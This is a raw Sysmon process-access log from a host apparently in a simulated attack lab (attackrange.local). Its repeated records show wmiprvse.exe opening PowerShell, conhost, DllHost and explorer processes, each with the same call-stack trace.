:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DFAA-00000000AD01}11172C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DDAA-00000000AD01}5224C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 